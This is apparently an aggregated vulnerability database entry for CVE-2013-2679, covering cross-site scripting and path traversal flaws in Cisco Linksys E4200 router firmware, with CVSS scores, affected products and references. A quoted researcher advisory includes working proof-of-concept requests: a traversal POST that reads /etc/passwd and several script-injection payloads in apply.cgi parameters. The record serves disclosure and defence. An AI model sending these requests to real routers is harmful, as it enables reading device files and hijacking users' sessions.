ID

VAR-202002-0520


CVE

CVE-2013-2679


TITLE

Cisco Linksys E4200 Router Cross-Site Scripting Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2013-05035 // CNNVD: CNNVD-201305-151

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E4200 router with firmware 1.0.05 build 7 allow remote attackers to inject arbitrary web script or HTML via the (1) log_type, (2) ping_ip, (3) ping_size, (4) submit_type, or (5) traceroute_ip parameter to apply.cgi or (6) new_workgroup or (7) submit_button parameter to storage/apply.cgi.

A cross-site scripting vulnerability exists in Cisco Linksys E4200 routers. Information may be obtained and tampered with.

The Cisco Linksys E1200 N300 is a wireless router from Cisco, USA. When a user browses an affected website, their browser will execute arbitrary code provided by the attacker, which may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

=============================================
XSS, LFI in Cisco, Linksys E4200 Firmware
=============================================
URL: http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html
=============================================
January 30, 2013
=============================================
Keywords
=============================================
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection, Exploit, Zero Day, Cisco, Linksys, E4200, Wireless Router, cyberTAN Corp
CVE-2013-2678, CVE-2013-2679, CVE-2013-2680, CVE-2013-2681, CVE-2013-2682, CVE-2013-2683, CVE-2013-2684
=============================================
Summary

Reflected XSS + LFI Bugs in the Cisco, Linksys E4200 Wireless Router Firmware Version: 1.0.05 build 7 were discovered by our Researchers in January 2013 and finally acknowledged by Linksys in April 2013. The Vendor is unable to Patch the Vulnerability in a reasonable timeframe. This document will introduce and discuss the vulnerability and provide Proof-of-Concept (PoC) Zero Day (0D) code examples for Firmware L Version 1.10 Released on July 9, 2012, and prior versions.
=============================================
Overview

Linksys is a brand of home and small office networking products and a company founded in 1988, which was acquired by Cisco Systems in 2003. In 2013, as part of its push away from the consumer market, Cisco sold their home networking division and Linksys to Belkin. Products currently and previously sold under the Linksys brand name include broadband and wireless routers, consumer and small business grade Ethernet switching, VoIP equipment, wireless internet video camera, AV products, network storage systems, and other products.

Linksys products were widely available in North America off-the-shelf from both consumer electronics stores (CompUSA and Best Buy), internet retailers, and big-box retail stores (WalMart). Linksys' significant competition as an independent networking firm were D-Link and NetGear, the latter for a time being a brand of Cisco competitor Nortel.
=============================================
Vendor Software Fingerprint
=============================================
# Copyright (C) 2009, CyberTAN Corporation
# All Rights Reserved.
#
# THIS SOFTWARE IS OFFERED "AS IS", AND CYBERTAN GRANTS NO WARRANTIES OF ANY
# KIND, EXPRESS OR IMPLIED, BY STATUTE.....
=============================================
The PoC's
=============================================
LFI PoC
=============================================
POST /storage/apply.cgi HTTP/1.1
HOST: my.vunerable.e4500.firmware

submit_type=nas_admin&submit_button=NAS_Administration&change_action=gozila_cgi&next_page=../../../../../../../../../../../../../../../../etc/passwd
=============================================
XSS PoC
=============================================
/apply.cgi [log_type parameter]
/apply.cgi [ping_ip parameter]
/apply.cgi [ping_size parameter]
/apply.cgi [submit_type parameter]
/apply.cgi [traceroute_ip parameter]
/storage/apply.cgi [new_workgroup parameter]
/storage/apply.cgi [submit_button parameter]
=============================================
POST /apply.cgi HTTP/1.1
...

change_action=gozila_cgi&submit_button=Log_View&submit_type=undefined&log_type=&log_type=ilog14568"%3balert(1)//482
=============================================
Other XSS PoC's
=============================================
&ping_ip='><script>alert(1)</script>
&ping_size='><script>alert(1)</script>
&submit_type=start_traceroute'%3balert(1)//
&traceroute_ip=a.b.c.d"><script>alert(1)</script>
=============================================
CVE Information
=============================================
File path traversal                        CVE-2013-2678
Cross-site scripting (reflected)           CVE-2013-2679
Cleartext submission of password           CVE-2013-2680
Password field with autocomplete enabled   CVE-2013-2681
Frameable response (Clickjacking)          CVE-2013-2682
Private IP addresses disclosed             CVE-2013-2683
HTML does not specify charset              CVE-2013-2684

CVSS Version 2 Score = 4.5
=============================================
END
=============================================

Trust: 3.87

sources: NVD: CVE-2013-2679 // JVNDB: JVNDB-2013-007275 // CNVD: CNVD-2013-07838 // CNVD: CNVD-2013-05035 // CNNVD: CNNVD-201305-055 // BID: 59715 // BID: 59558 // PACKETSTORM: 121551

IOT TAXONOMY

category: ['Network device'], sub_category: -

Trust: 1.2

sources: CNVD: CNVD-2013-07838 // CNVD: CNVD-2013-05035

AFFECTED PRODUCTS

vendor: belkin, model: linksys e4200, scope: eq, version: 1.0.05

Trust: 1.0

vendor: cisco, model: linksys e4200, scope: eq, version: 1.0.05 build 7

Trust: 0.8

vendor: cisco, model: linksys e1200 n300 router, scope: eq, version: 2.0.04

Trust: 0.6

vendor: cisco, model: linksys e4200, scope: -, version: -

Trust: 0.6

vendor: cisco, model: linksys e4200 build, scope: eq, version: 1.0.057

Trust: 0.3

sources: CNVD: CNVD-2013-07838 // CNVD: CNVD-2013-05035 // BID: 59715 // JVNDB: JVNDB-2013-007275 // NVD: CVE-2013-2679

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2013-2679
value: MEDIUM

Trust: 1.0

NVD: JVNDB-2013-007275
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2013-07838
value: MEDIUM

Trust: 0.6

CNVD: CNVD-2013-05035
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201305-151
value: MEDIUM

Trust: 0.6

nvd@nist.gov: CVE-2013-2679
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.0

NVD: JVNDB-2013-007275
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2013-07838
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2013-05035
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2013-2679
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.1

Trust: 1.0

NVD: JVNDB-2013-007275
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2013-07838 // CNVD: CNVD-2013-05035 // JVNDB: JVNDB-2013-007275 // CNNVD: CNNVD-201305-151 // NVD: CVE-2013-2679

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.8

sources: JVNDB: JVNDB-2013-007275 // NVD: CVE-2013-2679

THREAT TYPE

remote

Trust: 1.2

sources: CNNVD: CNNVD-201305-055 // CNNVD: CNNVD-201305-151

TYPE

XSS

Trust: 1.2

sources: CNNVD: CNNVD-201305-055 // CNNVD: CNNVD-201305-151

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-007275

PATCH

title: Top Page
url: https://www.linksys.com/us/

Trust: 0.8

title: Cisco Linksys E1200 N300 Router 'submit_button' parameter cross-site scripting vulnerability patch
url: https://www.cnvd.org.cn/patchInfo/show/34770

Trust: 0.6

sources: CNVD: CNVD-2013-07838 // JVNDB: JVNDB-2013-007275

EXTERNAL IDS

db: NVD, id: CVE-2013-2679

Trust: 3.7

db: PACKETSTORM, id: 121551

Trust: 2.5

db: OSVDB, id: 93060

Trust: 1.6

db: OSVDB, id: 93059

Trust: 1.6

db: BID, id: 59558

Trust: 1.5

db: BID, id: 59715

Trust: 0.9

db: JVNDB, id: JVNDB-2013-007275

Trust: 0.8

db: CNVD, id: CNVD-2013-07838

Trust: 0.6

db: EXPLOIT-DB, id: 25292

Trust: 0.6

db: CNVD, id: CNVD-2013-05035

Trust: 0.6

db: CNNVD, id: CNNVD-201305-055

Trust: 0.6

db: CNNVD, id: CNNVD-201305-151

Trust: 0.6

sources: CNVD: CNVD-2013-07838 // CNVD: CNVD-2013-05035 // BID: 59715 // BID: 59558 // JVNDB: JVNDB-2013-007275 // PACKETSTORM: 121551 // CNNVD: CNNVD-201305-055 // CNNVD: CNNVD-201305-151 // NVD: CVE-2013-2679

REFERENCES

url:http://packetstormsecurity.com/files/121551/cisco-linksys-e4200-cross-site-scripting-local-file-inclusion.html

Trust: 2.4

url:http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html

Trust: 2.0

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/84069

Trust: 1.6

url:http://osvdb.org/93059

Trust: 1.6

url:http://osvdb.org/93060

Trust: 1.6

url:https://nvd.nist.gov/vuln/detail/cve-2013-2679

Trust: 1.5

url:http://www.securityfocus.com/bid/59558

Trust: 1.2

url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2679

Trust: 0.8

url:http://www.exploit-db.com/exploits/25292/

Trust: 0.6

url:http://support.linksys.com/en-us/support/routers/e4200

Trust: 0.3

url:http://www.cisco.com

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2013-2683

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2684

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2681

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2680

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2682

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-2678

Trust: 0.1

sources: CNVD: CNVD-2013-07838 // CNVD: CNVD-2013-05035 // BID: 59715 // BID: 59558 // JVNDB: JVNDB-2013-007275 // PACKETSTORM: 121551 // CNNVD: CNNVD-201305-055 // CNNVD: CNNVD-201305-151 // NVD: CVE-2013-2679

CREDITS

sqlhacker

Trust: 1.0

sources: BID: 59715 // PACKETSTORM: 121551 // CNNVD: CNNVD-201305-151

SOURCES

db: CNVD, id: CNVD-2013-07838
db: CNVD, id: CNVD-2013-05035
db: BID, id: 59715
db: BID, id: 59558
db: JVNDB, id: JVNDB-2013-007275
db: PACKETSTORM, id: 121551
db: CNNVD, id: CNNVD-201305-055
db: CNNVD, id: CNNVD-201305-151
db: NVD, id: CVE-2013-2679

LAST UPDATE DATE

2024-08-14T13:24:59.042000+00:00


SOURCES UPDATE DATE

db: CNVD, id: CNVD-2013-07838, date: 2013-06-24T00:00:00
db: CNVD, id: CNVD-2013-05035, date: 2013-05-26T00:00:00
db: BID, id: 59715, date: 2013-05-06T00:00:00
db: BID, id: 59558, date: 2013-07-10T14:22:00
db: JVNDB, id: JVNDB-2013-007275, date: 2020-03-09T00:00:00
db: CNNVD, id: CNNVD-201305-055, date: 2013-05-03T00:00:00
db: CNNVD, id: CNNVD-201305-151, date: 2020-02-28T00:00:00
db: NVD, id: CVE-2013-2679, date: 2020-02-27T16:58:39.317

SOURCES RELEASE DATE

db: CNVD, id: CNVD-2013-07838, date: 2013-06-24T00:00:00
db: CNVD, id: CNVD-2013-05035, date: 2013-05-10T00:00:00
db: BID, id: 59715, date: 2013-05-06T00:00:00
db: BID, id: 59558, date: 2013-04-27T00:00:00
db: JVNDB, id: JVNDB-2013-007275, date: 2020-03-09T00:00:00
db: PACKETSTORM, id: 121551, date: 2013-05-07T20:22:22
db: CNNVD, id: CNNVD-201305-055, date: 2013-04-27T00:00:00
db: CNNVD, id: CNNVD-201305-151, date: 2013-05-09T00:00:00
db: NVD, id: CVE-2013-2679, date: 2020-02-18T17:15:12.500